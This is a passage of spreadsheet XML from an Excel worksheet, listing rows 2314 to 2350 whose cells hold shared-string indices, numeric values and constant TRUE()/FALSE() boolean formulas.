      </c>
      <c r="U2314" t="s">
        <v>2628</v>
      </c>
    </row>
    <row r="2315" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2315" s="1">
        <v>18683</v>
      </c>
      <c r="B2315" t="s">
        <v>75</v>
      </c>
      <c r="C2315" t="s">
        <v>583</v>
      </c>
      <c r="D2315" t="s">
        <v>2670</v>
      </c>
      <c r="E2315" t="s">
        <v>2625</v>
      </c>
      <c r="F2315">
        <v>2868660</v>
      </c>
      <c r="G2315" t="b">
        <f>FALSE()</f>
        <v>0</v>
      </c>
      <c r="J2315" t="s">
        <v>2674</v>
      </c>
      <c r="K2315">
        <v>0</v>
      </c>
      <c r="R2315" t="s">
        <v>20</v>
      </c>
      <c r="S2315" t="s">
        <v>2627</v>
      </c>
      <c r="T2315" t="s">
        <v>7</v>
      </c>
      <c r="U2315" t="s">
        <v>2628</v>
      </c>
    </row>
    <row r="2316" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2316" s="1">
        <v>18684</v>
      </c>
      <c r="B2316" t="s">
        <v>75</v>
      </c>
      <c r="C2316" t="s">
        <v>583</v>
      </c>
      <c r="D2316" t="s">
        <v>2670</v>
      </c>
      <c r="E2316" t="s">
        <v>2625</v>
      </c>
      <c r="F2316">
        <v>2868660</v>
      </c>
      <c r="G2316" t="b">
        <f>FALSE()</f>
        <v>0</v>
      </c>
      <c r="J2316" t="s">
        <v>2675</v>
      </c>
      <c r="K2316">
        <v>0</v>
      </c>
      <c r="R2316" t="s">
        <v>20</v>
      </c>
      <c r="S2316" t="s">
        <v>2627</v>
      </c>
      <c r="T2316" t="s">
        <v>7</v>
      </c>
      <c r="U2316" t="s">
        <v>2628</v>
      </c>
    </row>
    <row r="2317" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2317" s="1">
        <v>18685</v>
      </c>
      <c r="B2317" t="s">
        <v>75</v>
      </c>
      <c r="C2317" t="s">
        <v>583</v>
      </c>
      <c r="D2317" t="s">
        <v>2670</v>
      </c>
      <c r="E2317" t="s">
        <v>2625</v>
      </c>
      <c r="F2317">
        <v>2868660</v>
      </c>
      <c r="G2317" t="b">
        <f>FALSE()</f>
        <v>0</v>
      </c>
      <c r="J2317" t="s">
        <v>2676</v>
      </c>
      <c r="K2317">
        <v>0</v>
      </c>
      <c r="R2317" t="s">
        <v>20</v>
      </c>
      <c r="S2317" t="s">
        <v>2627</v>
      </c>
      <c r="T2317" t="s">
        <v>7</v>
      </c>
      <c r="U2317" t="s">
        <v>2628</v>
      </c>
    </row>
    <row r="2318" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2318" s="1">
        <v>18686</v>
      </c>
      <c r="B2318" t="s">
        <v>75</v>
      </c>
      <c r="C2318" t="s">
        <v>583</v>
      </c>
      <c r="D2318" t="s">
        <v>2670</v>
      </c>
      <c r="E2318" t="s">
        <v>2625</v>
      </c>
      <c r="F2318">
        <v>2868660</v>
      </c>
      <c r="G2318" t="b">
        <f>FALSE()</f>
        <v>0</v>
      </c>
      <c r="J2318" t="s">
        <v>2677</v>
      </c>
      <c r="K2318">
        <v>0</v>
      </c>
      <c r="R2318" t="s">
        <v>20</v>
      </c>
      <c r="S2318" t="s">
        <v>2627</v>
      </c>
      <c r="T2318" t="s">
        <v>7</v>
      </c>
      <c r="U2318" t="s">
        <v>2628</v>
      </c>
    </row>
    <row r="2319" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2319" s="1">
        <v>18687</v>
      </c>
      <c r="B2319" t="s">
        <v>75</v>
      </c>
      <c r="C2319" t="s">
        <v>583</v>
      </c>
      <c r="D2319" t="s">
        <v>2670</v>
      </c>
      <c r="E2319" t="s">
        <v>2625</v>
      </c>
      <c r="F2319">
        <v>2868660</v>
      </c>
      <c r="G2319" t="b">
        <f>FALSE()</f>
        <v>0</v>
      </c>
      <c r="J2319" t="s">
        <v>2678</v>
      </c>
      <c r="K2319">
        <v>0</v>
      </c>
      <c r="R2319" t="s">
        <v>20</v>
      </c>
      <c r="S2319" t="s">
        <v>2627</v>
      </c>
      <c r="T2319" t="s">
        <v>7</v>
      </c>
      <c r="U2319" t="s">
        <v>2628</v>
      </c>
    </row>
    <row r="2320" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2320" s="1">
        <v>18688</v>
      </c>
      <c r="B2320" t="s">
        <v>75</v>
      </c>
      <c r="C2320" t="s">
        <v>583</v>
      </c>
      <c r="D2320" t="s">
        <v>2670</v>
      </c>
      <c r="E2320" t="s">
        <v>2625</v>
      </c>
      <c r="F2320">
        <v>2868660</v>
      </c>
      <c r="G2320" t="b">
        <f>FALSE()</f>
        <v>0</v>
      </c>
      <c r="J2320" t="s">
        <v>2679</v>
      </c>
      <c r="K2320">
        <v>0</v>
      </c>
      <c r="R2320" t="s">
        <v>20</v>
      </c>
      <c r="S2320" t="s">
        <v>2627</v>
      </c>
      <c r="T2320" t="s">
        <v>7</v>
      </c>
      <c r="U2320" t="s">
        <v>2628</v>
      </c>
    </row>
    <row r="2321" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2321" s="1">
        <v>18689</v>
      </c>
      <c r="B2321" t="s">
        <v>75</v>
      </c>
      <c r="C2321" t="s">
        <v>583</v>
      </c>
      <c r="D2321" t="s">
        <v>2670</v>
      </c>
      <c r="E2321" t="s">
        <v>2625</v>
      </c>
      <c r="F2321">
        <v>2868660</v>
      </c>
      <c r="G2321" t="b">
        <f>FALSE()</f>
        <v>0</v>
      </c>
      <c r="J2321" t="s">
        <v>2680</v>
      </c>
      <c r="K2321">
        <v>0</v>
      </c>
      <c r="R2321" t="s">
        <v>20</v>
      </c>
      <c r="S2321" t="s">
        <v>2627</v>
      </c>
      <c r="T2321" t="s">
        <v>7</v>
      </c>
      <c r="U2321" t="s">
        <v>2628</v>
      </c>
    </row>
    <row r="2322" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2322" s="1">
        <v>18690</v>
      </c>
      <c r="B2322" t="s">
        <v>75</v>
      </c>
      <c r="C2322" t="s">
        <v>583</v>
      </c>
      <c r="D2322" t="s">
        <v>2670</v>
      </c>
      <c r="E2322" t="s">
        <v>2625</v>
      </c>
      <c r="F2322">
        <v>2868660</v>
      </c>
      <c r="G2322" t="b">
        <f>FALSE()</f>
        <v>0</v>
      </c>
      <c r="J2322" t="s">
        <v>2681</v>
      </c>
      <c r="K2322">
        <v>0</v>
      </c>
      <c r="R2322" t="s">
        <v>20</v>
      </c>
      <c r="S2322" t="s">
        <v>2627</v>
      </c>
      <c r="T2322" t="s">
        <v>7</v>
      </c>
      <c r="U2322" t="s">
        <v>2628</v>
      </c>
    </row>
    <row r="2323" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2323" s="1">
        <v>18691</v>
      </c>
      <c r="B2323" t="s">
        <v>75</v>
      </c>
      <c r="C2323" t="s">
        <v>583</v>
      </c>
      <c r="D2323" t="s">
        <v>2670</v>
      </c>
      <c r="E2323" t="s">
        <v>2625</v>
      </c>
      <c r="F2323">
        <v>2868660</v>
      </c>
      <c r="G2323" t="b">
        <f>FALSE()</f>
        <v>0</v>
      </c>
      <c r="J2323" t="s">
        <v>2682</v>
      </c>
      <c r="K2323">
        <v>0</v>
      </c>
      <c r="R2323" t="s">
        <v>20</v>
      </c>
      <c r="S2323" t="s">
        <v>2627</v>
      </c>
      <c r="T2323" t="s">
        <v>7</v>
      </c>
      <c r="U2323" t="s">
        <v>2628</v>
      </c>
    </row>
    <row r="2324" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2324" s="1">
        <v>18692</v>
      </c>
      <c r="B2324" t="s">
        <v>75</v>
      </c>
      <c r="C2324" t="s">
        <v>64</v>
      </c>
      <c r="D2324" t="s">
        <v>2683</v>
      </c>
      <c r="E2324" t="s">
        <v>2684</v>
      </c>
      <c r="F2324">
        <v>12</v>
      </c>
      <c r="G2324" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J2324" t="s">
        <v>2685</v>
      </c>
      <c r="K2324">
        <v>0</v>
      </c>
      <c r="R2324" t="s">
        <v>115</v>
      </c>
      <c r="S2324" t="s">
        <v>2686</v>
      </c>
      <c r="T2324" t="s">
        <v>7</v>
      </c>
      <c r="U2324" t="s">
        <v>83</v>
      </c>
    </row>
    <row r="2325" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2325" s="1">
        <v>18693</v>
      </c>
      <c r="B2325" t="s">
        <v>0</v>
      </c>
      <c r="C2325" t="s">
        <v>78</v>
      </c>
      <c r="D2325" t="s">
        <v>2687</v>
      </c>
      <c r="E2325" t="s">
        <v>2684</v>
      </c>
      <c r="F2325">
        <v>11</v>
      </c>
      <c r="G2325" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J2325" t="s">
        <v>2688</v>
      </c>
      <c r="K2325">
        <v>0</v>
      </c>
      <c r="R2325" t="s">
        <v>115</v>
      </c>
      <c r="S2325" t="s">
        <v>2686</v>
      </c>
      <c r="T2325" t="s">
        <v>7</v>
      </c>
      <c r="U2325" t="s">
        <v>83</v>
      </c>
    </row>
    <row r="2326" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2326" s="1">
        <v>18694</v>
      </c>
      <c r="B2326" t="s">
        <v>0</v>
      </c>
      <c r="C2326" t="s">
        <v>111</v>
      </c>
      <c r="D2326" t="s">
        <v>2689</v>
      </c>
      <c r="E2326" t="s">
        <v>2684</v>
      </c>
      <c r="F2326">
        <v>10</v>
      </c>
      <c r="G2326" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J2326" t="s">
        <v>2690</v>
      </c>
      <c r="K2326">
        <v>0</v>
      </c>
      <c r="R2326" t="s">
        <v>115</v>
      </c>
      <c r="S2326" t="s">
        <v>2686</v>
      </c>
      <c r="T2326" t="s">
        <v>7</v>
      </c>
      <c r="U2326" t="s">
        <v>83</v>
      </c>
    </row>
    <row r="2327" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2327" s="1">
        <v>18695</v>
      </c>
      <c r="B2327" t="s">
        <v>75</v>
      </c>
      <c r="C2327" t="s">
        <v>67</v>
      </c>
      <c r="D2327" t="s">
        <v>2691</v>
      </c>
      <c r="E2327" t="s">
        <v>2684</v>
      </c>
      <c r="F2327">
        <v>9</v>
      </c>
      <c r="G2327" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J2327" t="s">
        <v>2692</v>
      </c>
      <c r="K2327">
        <v>0</v>
      </c>
      <c r="R2327" t="s">
        <v>115</v>
      </c>
      <c r="S2327" t="s">
        <v>2686</v>
      </c>
      <c r="T2327" t="s">
        <v>7</v>
      </c>
      <c r="U2327" t="s">
        <v>83</v>
      </c>
    </row>
    <row r="2328" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2328" s="1">
        <v>18696</v>
      </c>
      <c r="B2328" t="s">
        <v>0</v>
      </c>
      <c r="C2328" t="s">
        <v>111</v>
      </c>
      <c r="D2328" t="s">
        <v>2693</v>
      </c>
      <c r="E2328" t="s">
        <v>2684</v>
      </c>
      <c r="F2328">
        <v>8</v>
      </c>
      <c r="G2328" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J2328" t="s">
        <v>2694</v>
      </c>
      <c r="K2328">
        <v>0</v>
      </c>
      <c r="R2328" t="s">
        <v>115</v>
      </c>
      <c r="S2328" t="s">
        <v>2686</v>
      </c>
      <c r="T2328" t="s">
        <v>7</v>
      </c>
      <c r="U2328" t="s">
        <v>83</v>
      </c>
    </row>
    <row r="2329" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2329" s="1">
        <v>18697</v>
      </c>
      <c r="B2329" t="s">
        <v>0</v>
      </c>
      <c r="C2329" t="s">
        <v>78</v>
      </c>
      <c r="D2329" t="s">
        <v>2695</v>
      </c>
      <c r="E2329" t="s">
        <v>2684</v>
      </c>
      <c r="F2329">
        <v>3</v>
      </c>
      <c r="G2329" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J2329" t="s">
        <v>2696</v>
      </c>
      <c r="K2329">
        <v>0</v>
      </c>
      <c r="R2329" t="s">
        <v>115</v>
      </c>
      <c r="S2329" t="s">
        <v>2686</v>
      </c>
      <c r="T2329" t="s">
        <v>7</v>
      </c>
      <c r="U2329" t="s">
        <v>83</v>
      </c>
    </row>
    <row r="2330" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2330" s="1">
        <v>18698</v>
      </c>
      <c r="B2330" t="s">
        <v>10</v>
      </c>
      <c r="C2330" t="s">
        <v>11</v>
      </c>
      <c r="D2330" t="s">
        <v>2697</v>
      </c>
      <c r="E2330" t="s">
        <v>2698</v>
      </c>
      <c r="F2330">
        <v>106</v>
      </c>
      <c r="G2330" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J2330" t="s">
        <v>2699</v>
      </c>
      <c r="K2330">
        <v>0</v>
      </c>
      <c r="R2330" t="s">
        <v>20</v>
      </c>
      <c r="S2330" t="s">
        <v>2700</v>
      </c>
      <c r="T2330" t="s">
        <v>7</v>
      </c>
      <c r="U2330" t="s">
        <v>248</v>
      </c>
    </row>
    <row r="2331" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2331" s="1">
        <v>18699</v>
      </c>
      <c r="B2331" t="s">
        <v>10</v>
      </c>
      <c r="C2331" t="s">
        <v>11</v>
      </c>
      <c r="D2331" t="s">
        <v>2697</v>
      </c>
      <c r="E2331" t="s">
        <v>2698</v>
      </c>
      <c r="F2331">
        <v>106</v>
      </c>
      <c r="G2331" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J2331" t="s">
        <v>2701</v>
      </c>
      <c r="K2331">
        <v>0</v>
      </c>
      <c r="R2331" t="s">
        <v>20</v>
      </c>
      <c r="S2331" t="s">
        <v>2700</v>
      </c>
      <c r="T2331" t="s">
        <v>7</v>
      </c>
      <c r="U2331" t="s">
        <v>248</v>
      </c>
    </row>
    <row r="2332" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2332" s="1">
        <v>18700</v>
      </c>
      <c r="B2332" t="s">
        <v>10</v>
      </c>
      <c r="C2332" t="s">
        <v>11</v>
      </c>
      <c r="D2332" t="s">
        <v>2697</v>
      </c>
      <c r="E2332" t="s">
        <v>2698</v>
      </c>
      <c r="F2332">
        <v>106</v>
      </c>
      <c r="G2332" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J2332" t="s">
        <v>2702</v>
      </c>
      <c r="K2332">
        <v>0</v>
      </c>
      <c r="R2332" t="s">
        <v>20</v>
      </c>
      <c r="S2332" t="s">
        <v>2700</v>
      </c>
      <c r="T2332" t="s">
        <v>7</v>
      </c>
      <c r="U2332" t="s">
        <v>248</v>
      </c>
    </row>
    <row r="2333" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2333" s="1">
        <v>18701</v>
      </c>
      <c r="B2333" t="s">
        <v>10</v>
      </c>
      <c r="C2333" t="s">
        <v>11</v>
      </c>
      <c r="D2333" t="s">
        <v>2697</v>
      </c>
      <c r="E2333" t="s">
        <v>2698</v>
      </c>
      <c r="F2333">
        <v>106</v>
      </c>
      <c r="G2333" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J2333" t="s">
        <v>2703</v>
      </c>
      <c r="K2333">
        <v>0</v>
      </c>
      <c r="R2333" t="s">
        <v>20</v>
      </c>
      <c r="S2333" t="s">
        <v>2700</v>
      </c>
      <c r="T2333" t="s">
        <v>7</v>
      </c>
      <c r="U2333" t="s">
        <v>248</v>
      </c>
    </row>
    <row r="2334" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2334" s="1">
        <v>18702</v>
      </c>
      <c r="B2334" t="s">
        <v>10</v>
      </c>
      <c r="C2334" t="s">
        <v>11</v>
      </c>
      <c r="D2334" t="s">
        <v>2697</v>
      </c>
      <c r="E2334" t="s">
        <v>2698</v>
      </c>
      <c r="F2334">
        <v>106</v>
      </c>
      <c r="G2334" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J2334" t="s">
        <v>2704</v>
      </c>
      <c r="K2334">
        <v>0</v>
      </c>
      <c r="R2334" t="s">
        <v>20</v>
      </c>
      <c r="S2334" t="s">
        <v>2700</v>
      </c>
      <c r="T2334" t="s">
        <v>7</v>
      </c>
      <c r="U2334" t="s">
        <v>248</v>
      </c>
    </row>
    <row r="2335" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2335" s="1">
        <v>18703</v>
      </c>
      <c r="B2335" t="s">
        <v>10</v>
      </c>
      <c r="C2335" t="s">
        <v>11</v>
      </c>
      <c r="D2335" t="s">
        <v>2697</v>
      </c>
      <c r="E2335" t="s">
        <v>2698</v>
      </c>
      <c r="F2335">
        <v>106</v>
      </c>
      <c r="G2335" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J2335" t="s">
        <v>2705</v>
      </c>
      <c r="K2335">
        <v>0</v>
      </c>
      <c r="R2335" t="s">
        <v>20</v>
      </c>
      <c r="S2335" t="s">
        <v>2700</v>
      </c>
      <c r="T2335" t="s">
        <v>7</v>
      </c>
      <c r="U2335" t="s">
        <v>248</v>
      </c>
    </row>
    <row r="2336" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2336" s="1">
        <v>18704</v>
      </c>
      <c r="B2336" t="s">
        <v>10</v>
      </c>
      <c r="C2336" t="s">
        <v>11</v>
      </c>
      <c r="D2336" t="s">
        <v>2697</v>
      </c>
      <c r="E2336" t="s">
        <v>2698</v>
      </c>
      <c r="F2336">
        <v>106</v>
      </c>
      <c r="G2336" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J2336" t="s">
        <v>2706</v>
      </c>
      <c r="K2336">
        <v>0</v>
      </c>
      <c r="R2336" t="s">
        <v>20</v>
      </c>
      <c r="S2336" t="s">
        <v>2700</v>
      </c>
      <c r="T2336" t="s">
        <v>7</v>
      </c>
      <c r="U2336" t="s">
        <v>248</v>
      </c>
    </row>
    <row r="2337" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2337" s="1">
        <v>18705</v>
      </c>
      <c r="B2337" t="s">
        <v>10</v>
      </c>
      <c r="C2337" t="s">
        <v>11</v>
      </c>
      <c r="D2337" t="s">
        <v>2697</v>
      </c>
      <c r="E2337" t="s">
        <v>2698</v>
      </c>
      <c r="F2337">
        <v>106</v>
      </c>
      <c r="G2337" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J2337" t="s">
        <v>2707</v>
      </c>
      <c r="K2337">
        <v>0</v>
      </c>
      <c r="R2337" t="s">
        <v>20</v>
      </c>
      <c r="S2337" t="s">
        <v>2700</v>
      </c>
      <c r="T2337" t="s">
        <v>7</v>
      </c>
      <c r="U2337" t="s">
        <v>248</v>
      </c>
    </row>
    <row r="2338" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2338" s="1">
        <v>18706</v>
      </c>
      <c r="B2338" t="s">
        <v>10</v>
      </c>
      <c r="C2338" t="s">
        <v>11</v>
      </c>
      <c r="D2338" t="s">
        <v>2697</v>
      </c>
      <c r="E2338" t="s">
        <v>2698</v>
      </c>
      <c r="F2338">
        <v>106</v>
      </c>
      <c r="G2338" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J2338" t="s">
        <v>2708</v>
      </c>
      <c r="K2338">
        <v>0</v>
      </c>
      <c r="R2338" t="s">
        <v>20</v>
      </c>
      <c r="S2338" t="s">
        <v>2700</v>
      </c>
      <c r="T2338" t="s">
        <v>7</v>
      </c>
      <c r="U2338" t="s">
        <v>248</v>
      </c>
    </row>
    <row r="2339" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2339" s="1">
        <v>18707</v>
      </c>
      <c r="B2339" t="s">
        <v>10</v>
      </c>
      <c r="C2339" t="s">
        <v>11</v>
      </c>
      <c r="D2339" t="s">
        <v>2697</v>
      </c>
      <c r="E2339" t="s">
        <v>2698</v>
      </c>
      <c r="F2339">
        <v>106</v>
      </c>
      <c r="G2339" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J2339" t="s">
        <v>2709</v>
      </c>
      <c r="K2339">
        <v>0</v>
      </c>
      <c r="R2339" t="s">
        <v>20</v>
      </c>
      <c r="S2339" t="s">
        <v>2700</v>
      </c>
      <c r="T2339" t="s">
        <v>7</v>
      </c>
      <c r="U2339" t="s">
        <v>248</v>
      </c>
    </row>
    <row r="2340" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2340" s="1">
        <v>18708</v>
      </c>
      <c r="B2340" t="s">
        <v>10</v>
      </c>
      <c r="C2340" t="s">
        <v>11</v>
      </c>
      <c r="D2340" t="s">
        <v>2697</v>
      </c>
      <c r="E2340" t="s">
        <v>2698</v>
      </c>
      <c r="F2340">
        <v>106</v>
      </c>
      <c r="G2340" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J2340" t="s">
        <v>2710</v>
      </c>
      <c r="K2340">
        <v>0</v>
      </c>
      <c r="R2340" t="s">
        <v>20</v>
      </c>
      <c r="S2340" t="s">
        <v>2700</v>
      </c>
      <c r="T2340" t="s">
        <v>7</v>
      </c>
      <c r="U2340" t="s">
        <v>248</v>
      </c>
    </row>
    <row r="2341" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2341" s="1">
        <v>18709</v>
      </c>
      <c r="B2341" t="s">
        <v>10</v>
      </c>
      <c r="C2341" t="s">
        <v>11</v>
      </c>
      <c r="D2341" t="s">
        <v>2697</v>
      </c>
      <c r="E2341" t="s">
        <v>2698</v>
      </c>
      <c r="F2341">
        <v>106</v>
      </c>
      <c r="G2341" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J2341" t="s">
        <v>2711</v>
      </c>
      <c r="K2341">
        <v>0</v>
      </c>
      <c r="R2341" t="s">
        <v>20</v>
      </c>
      <c r="S2341" t="s">
        <v>2700</v>
      </c>
      <c r="T2341" t="s">
        <v>7</v>
      </c>
      <c r="U2341" t="s">
        <v>248</v>
      </c>
    </row>
    <row r="2342" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2342" s="1">
        <v>18710</v>
      </c>
      <c r="B2342" t="s">
        <v>10</v>
      </c>
      <c r="C2342" t="s">
        <v>11</v>
      </c>
      <c r="D2342" t="s">
        <v>2697</v>
      </c>
      <c r="E2342" t="s">
        <v>2698</v>
      </c>
      <c r="F2342">
        <v>106</v>
      </c>
      <c r="G2342" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J2342" t="s">
        <v>2712</v>
      </c>
      <c r="K2342">
        <v>0</v>
      </c>
      <c r="R2342" t="s">
        <v>20</v>
      </c>
      <c r="S2342" t="s">
        <v>2700</v>
      </c>
      <c r="T2342" t="s">
        <v>7</v>
      </c>
      <c r="U2342" t="s">
        <v>248</v>
      </c>
    </row>
    <row r="2343" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2343" s="1">
        <v>18711</v>
      </c>
      <c r="B2343" t="s">
        <v>10</v>
      </c>
      <c r="C2343" t="s">
        <v>11</v>
      </c>
      <c r="D2343" t="s">
        <v>2697</v>
      </c>
      <c r="E2343" t="s">
        <v>2698</v>
      </c>
      <c r="F2343">
        <v>106</v>
      </c>
      <c r="G2343" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J2343" t="s">
        <v>2713</v>
      </c>
      <c r="K2343">
        <v>0</v>
      </c>
      <c r="R2343" t="s">
        <v>20</v>
      </c>
      <c r="S2343" t="s">
        <v>2700</v>
      </c>
      <c r="T2343" t="s">
        <v>7</v>
      </c>
      <c r="U2343" t="s">
        <v>248</v>
      </c>
    </row>
    <row r="2344" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2344" s="1">
        <v>18712</v>
      </c>
      <c r="B2344" t="s">
        <v>10</v>
      </c>
      <c r="C2344" t="s">
        <v>11</v>
      </c>
      <c r="D2344" t="s">
        <v>2697</v>
      </c>
      <c r="E2344" t="s">
        <v>2698</v>
      </c>
      <c r="F2344">
        <v>106</v>
      </c>
      <c r="G2344" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J2344" t="s">
        <v>2714</v>
      </c>
      <c r="K2344">
        <v>0</v>
      </c>
      <c r="R2344" t="s">
        <v>20</v>
      </c>
      <c r="S2344" t="s">
        <v>2700</v>
      </c>
      <c r="T2344" t="s">
        <v>7</v>
      </c>
      <c r="U2344" t="s">
        <v>248</v>
      </c>
    </row>
    <row r="2345" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2345" s="1">
        <v>18713</v>
      </c>
      <c r="B2345" t="s">
        <v>10</v>
      </c>
      <c r="C2345" t="s">
        <v>11</v>
      </c>
      <c r="D2345" t="s">
        <v>2697</v>
      </c>
      <c r="E2345" t="s">
        <v>2698</v>
      </c>
      <c r="F2345">
        <v>106</v>
      </c>
      <c r="G2345" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J2345" t="s">
        <v>2715</v>
      </c>
      <c r="K2345">
        <v>0</v>
      </c>
      <c r="R2345" t="s">
        <v>20</v>
      </c>
      <c r="S2345" t="s">
        <v>2700</v>
      </c>
      <c r="T2345" t="s">
        <v>7</v>
      </c>
      <c r="U2345" t="s">
        <v>248</v>
      </c>
    </row>
    <row r="2346" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2346" s="1">
        <v>18714</v>
      </c>
      <c r="B2346" t="s">
        <v>0</v>
      </c>
      <c r="C2346" t="s">
        <v>78</v>
      </c>
      <c r="D2346" t="s">
        <v>2716</v>
      </c>
      <c r="E2346" t="s">
        <v>2698</v>
      </c>
      <c r="F2346">
        <v>71</v>
      </c>
      <c r="G2346" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J2346" t="s">
        <v>2717</v>
      </c>
      <c r="K2346">
        <v>0</v>
      </c>
      <c r="L2346" t="s">
        <v>2718</v>
      </c>
      <c r="R2346" t="s">
        <v>20</v>
      </c>
      <c r="S2346" t="s">
        <v>2700</v>
      </c>
      <c r="T2346" t="s">
        <v>7</v>
      </c>
      <c r="U2346" t="s">
        <v>248</v>
      </c>
    </row>
    <row r="2347" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2347" s="1">
        <v>18715</v>
      </c>
      <c r="B2347" t="s">
        <v>0</v>
      </c>
      <c r="C2347" t="s">
        <v>22</v>
      </c>
      <c r="D2347" t="s">
        <v>2716</v>
      </c>
      <c r="E2347" t="s">
        <v>2698</v>
      </c>
      <c r="F2347">
        <v>71</v>
      </c>
      <c r="G2347" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J2347" t="s">
        <v>2719</v>
      </c>
      <c r="K2347">
        <v>0</v>
      </c>
      <c r="L2347" t="s">
        <v>2718</v>
      </c>
      <c r="R2347" t="s">
        <v>20</v>
      </c>
      <c r="S2347" t="s">
        <v>2700</v>
      </c>
      <c r="T2347" t="s">
        <v>7</v>
      </c>
      <c r="U2347" t="s">
        <v>248</v>
      </c>
    </row>
    <row r="2348" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2348" s="1">
        <v>18716</v>
      </c>
      <c r="B2348" t="s">
        <v>0</v>
      </c>
      <c r="C2348" t="s">
        <v>78</v>
      </c>
      <c r="D2348" t="s">
        <v>2716</v>
      </c>
      <c r="E2348" t="s">
        <v>2698</v>
      </c>
      <c r="F2348">
        <v>71</v>
      </c>
      <c r="G2348" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J2348" t="s">
        <v>2720</v>
      </c>
      <c r="K2348">
        <v>0</v>
      </c>
      <c r="L2348" t="s">
        <v>2718</v>
      </c>
      <c r="R2348" t="s">
        <v>20</v>
      </c>
      <c r="S2348" t="s">
        <v>2700</v>
      </c>
      <c r="T2348" t="s">
        <v>7</v>
      </c>
      <c r="U2348" t="s">
        <v>248</v>
      </c>
    </row>
    <row r="2349" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2349" s="1">
        <v>18717</v>
      </c>
      <c r="B2349" t="s">
        <v>0</v>
      </c>
      <c r="C2349" t="s">
        <v>22</v>
      </c>
      <c r="D2349" t="s">
        <v>2716</v>
      </c>
      <c r="E2349" t="s">
        <v>2698</v>
      </c>
      <c r="F2349">
        <v>71</v>
      </c>
      <c r="G2349" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J2349" t="s">
        <v>2721</v>
      </c>
      <c r="K2349">
        <v>0</v>
      </c>
      <c r="L2349" t="s">
        <v>2718</v>
      </c>
      <c r="R2349" t="s">
        <v>20</v>
      </c>
      <c r="S2349" t="s">
        <v>2700</v>
      </c>
      <c r="T2349" t="s">
        <v>7</v>
      </c>
      <c r="U2349" t="s">
        <v>248</v>
      </c>
    </row>
    <row r="2350" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2350" s="1">
        <v>18718</v>
      </c>
      <c r="B2350" t="s">
        <v>0</v>
      </c>
      <c r="C2350" t="s">
        <v>78</v>
      </c>
      <c r="D2350" t="s">
        <v>2716</v>
      </c>
      <c r="E2350" t="s">
        <v>2698</v>
      </c>
      <c r="F2350">
        <v>71</v>
      </c>
      <c r="G2350" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J2350" t="s">
        <v>2722</v>
      </c>
      <c r="K2350">
        <v>0</v>
      </c>
      <c r="L2350" t="s">
        <v>2718</v>
      </c>
      <c r="R2350" t="s">
        <v>20</v>
      </c>
      <c r="S2350" t="s">
        <v>2700</v>
      </c>
      <c r="T2350" t="s">
        <v>7</v>
      </c>
      <c r="U2350" t="s">
        <v>248</v>
      </c>
    </row>
